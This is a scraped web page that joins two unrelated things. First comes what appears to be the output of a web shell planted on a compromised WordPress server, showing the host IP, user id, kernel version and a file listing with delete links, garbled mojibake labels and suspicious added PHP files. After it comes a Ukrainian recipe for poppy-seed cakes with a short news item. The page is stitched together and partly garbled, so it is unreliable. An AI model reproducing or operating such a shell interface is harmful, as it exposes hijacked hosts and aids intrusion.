195.16.88.9 - Linux - whoami(krist287) - uid(1574) gid(1676)
kaylin

·

ϴΪ
ϼĿ¼ʱ޸ʱ
_.well-knownɾ 07552022-08-14 13:56:182022-04-19 08:48:45-
_ldɾ 07552022-08-14 13:54:002022-04-18 21:30:13-
_puɾ 07552022-08-14 13:54:032022-04-19 06:15:13-
doskaɾ 07552022-08-14 13:56:192022-05-13 00:21:36-
gboɾ 07552022-08-14 13:54:032022-04-21 16:29:19-
katalogɾ 07552022-08-14 13:54:032022-05-13 00:20:58-
nailɾ 07552022-08-14 13:54:062022-06-17 13:21:44-
testɾ 07552022-08-14 13:54:032022-04-18 15:34:19-
wakenɾ 07552022-08-11 02:53:342022-08-11 02:53:34-
wp-adminɾ 07552022-08-14 13:54:032022-04-18 17:42:42-
wp-contentɾ 07552022-08-14 14:40:542022-08-14 14:40:54-
wp-includesɾ 07552022-08-14 13:54:062022-04-18 17:42:24-
.htaccess 06442022-08-14 13:54:062022-06-30 09:23:1921.22 K
Damiendep 06442022-08-11 03:43:202022-08-11 03:43:209.20 K
backup.php 06442022-08-13 13:42:572022-08-13 13:42:57772 B
fibber.php 06442022-08-11 01:48:402022-08-11 01:48:4016.68 K
google5f28cd50ed83a936.html 06442022-08-14 13:54:032022-04-24 10:15:3853 B
index.php 06442022-08-14 14:40:552022-04-18 20:09:52405 B
license.txt 06442022-08-14 13:56:192022-04-18 20:09:5219.45 K
readme.html 06442022-08-14 13:54:062022-04-18 20:10:487.26 K
robots.txt 06442022-08-11 03:34:222022-08-11 03:34:22193 B
tmp.php 06442022-08-13 13:44:442022-08-13 13:44:44761 B
wp-activate.php 06442022-08-14 13:56:132022-04-18 20:09:527.00 K
wp-blog-header.php 06442022-08-14 13:55:502022-04-18 20:09:52351 B
wp-comments-post.php 06442022-08-14 13:54:062022-04-18 20:10:362.28 K
wp-config-sample.php 06442022-08-14 13:54:002022-04-18 20:10:482.93 K
wp-config.php 06442022-08-14 13:56:112022-04-18 20:09:523.69 K
wp-cron.php 06442022-08-14 14:40:482022-04-18 20:09:523.85 K
wp-links-opml.php 06442022-08-14 13:56:152022-04-18 20:09:522.44 K
wp-load.php 06442022-08-14 13:56:062022-04-18 20:09:523.81 K
wp-login.php 06442022-08-14 14:40:072022-04-18 20:09:5246.79 K
wp-mail.php 06442022-08-14 13:56:082022-04-18 20:09:528.38 K
wp-settings.php 06442022-08-14 13:54:062022-04-18 20:10:3622.49 K
wp-signup.php 06442022-08-14 13:56:182022-04-18 20:10:4831.21 K
wp-trackback.php 06442022-08-14 13:56:152022-04-18 20:09:524.64 K
wp.php 06442022-08-11 01:49:212022-08-11 01:49:21453 B
xmlrpc.php 06442022-08-14 14:40:552022-04-18 20:09:523.16 K
Ŀ¼[12] - ļ[25] - [0755]
Linux sr47.hostlife.net 3.10.0-962.3.2.lve1.5.49.el6h.x86_64 #1 SMP Thu Mar 4 07:40:03 EST 2021 x86_64
Apache/2
Рецепт на свята і будні: Як приготувати Тістечка з маком – Це Бориспіль
loader image
- Юна Українка подарувала Бориспільським кінологам «крилату конячку» яка виконує бажання. Днями, співробітники Кінологічного центру поліції Борисполя, які разом із ЗСУ та ТРО боронять рубежі Броварів, отримали цінний подарунок. Про це повідомляє прес-служба Кінологічного центру поліції в Київській області. Для наших відважних воїнів юна українка намалювала ліс, мирне небо та крилату конячку. За словами художниці, лоша здатне виконувати бажання. Варто лише доторкнутися до нього та подумати про те, чого хочеться найбільше. Картину юної мисткині передали на місце дислокації оборонців Берегині-волонтерки, які вже тривалий час докладають надлюдських зусиль аби забезпечувати воїнів усім необхідним. За бажанням авторки витвір потрапив саме до поліцейських кінологів. -
Меню Закрити

Рецепт на свята і будні: Як приготувати Тістечка з маком

/ 5. оценок:

Оценок пока нет. Поставьте оценку первым.

Дуже простий у приготуванні, а ще недорогий і випробуваний рецепт надзвичайно смачних і вишуканих тістечок з маком, привезений із Закарпаття.

Що потрібно для приготування тістечка з маком:

Для тіста (на невелику форму або тортівницю):
• 400 г борошна,
• 150 г цукру,
• 150-170 г будь-якого жиру (олії, смальцю або вершкового масла, маргарину),
• порошок для печива (півпачки),
• 3 жовтки,
• ванілін або цедра лимона.

Для начинки:
• склянка маку,
• склянка борошна вищого ґатунку,
• 300 г цукрової пудри,
• 2 неповні склянки кислого молока (кефіру),
• на кінчику ножа питної соди.
Також, за бажанням, можна додати родзинки та порізані волоські горіхи.

До речі, раніше ми писали Як зробити смачну макову начинку

Рецепт приготування:

Борошно змішуємо з порошком для печива та ваніліном або цедрою лимона, додаємо цукоо, жир (масло і маргарин кімнатної температури треба посікти ножем й перетерти з борошном), жовти і замішуємо тісто. Потім ділимо на 2 частини (одна більша).

Окремо збиваємо 3 білки до міцної піни, до них додаємо суміш меленого маку, борошна, цукрової пудри, кислого молока (кефіру) та питної соди. Все це перемішуємо.

З більшої частини тіста качалкою або руками формуємо нижній корж з бортиками. Виливаємо на нього макову суміш і розрівнюємо.

Розкачуємо верхній корж, накриваємо ним маковий шар (не треба боятися, що трохи рідкий!). Заклеюємо краї і проколюємо в декількох місцях зверху виделкою чи зубочисткою.

З 1 яйця і 1 столової ложки цукрової пудри добре збиваємо білок і змащуємо верхній корж.

Випікаємо у добре нагрітій духовці не менше 35-45 хвилин при температурі 180 градусів. Готовність перевіряємо зубочисткою або тонкою трісочкою – вона має бути суха.

Виймаємо форму або тортівницю з духовки, коли корж охолоне, нарізуємо невеликими прямокутниками або ромбиками.

Краще подати з чаєм, хоча, діти наврядче його дочекаються.

Смачного.

Ваша, Оленка Смачненька.

Переглядів:: 3
Share on facebook
Share on telegram
Share on twitter
guest
0 коментарiв
Межтекстовые Отзывы
Посмотреть все комментарии
Авторизація
*
*
Реєстрація
*
*
*
Пароль не введено
*
Генерація паролю
0
Оставьте комментарий! Напишите, что думаете по поводу статьи.x
()
x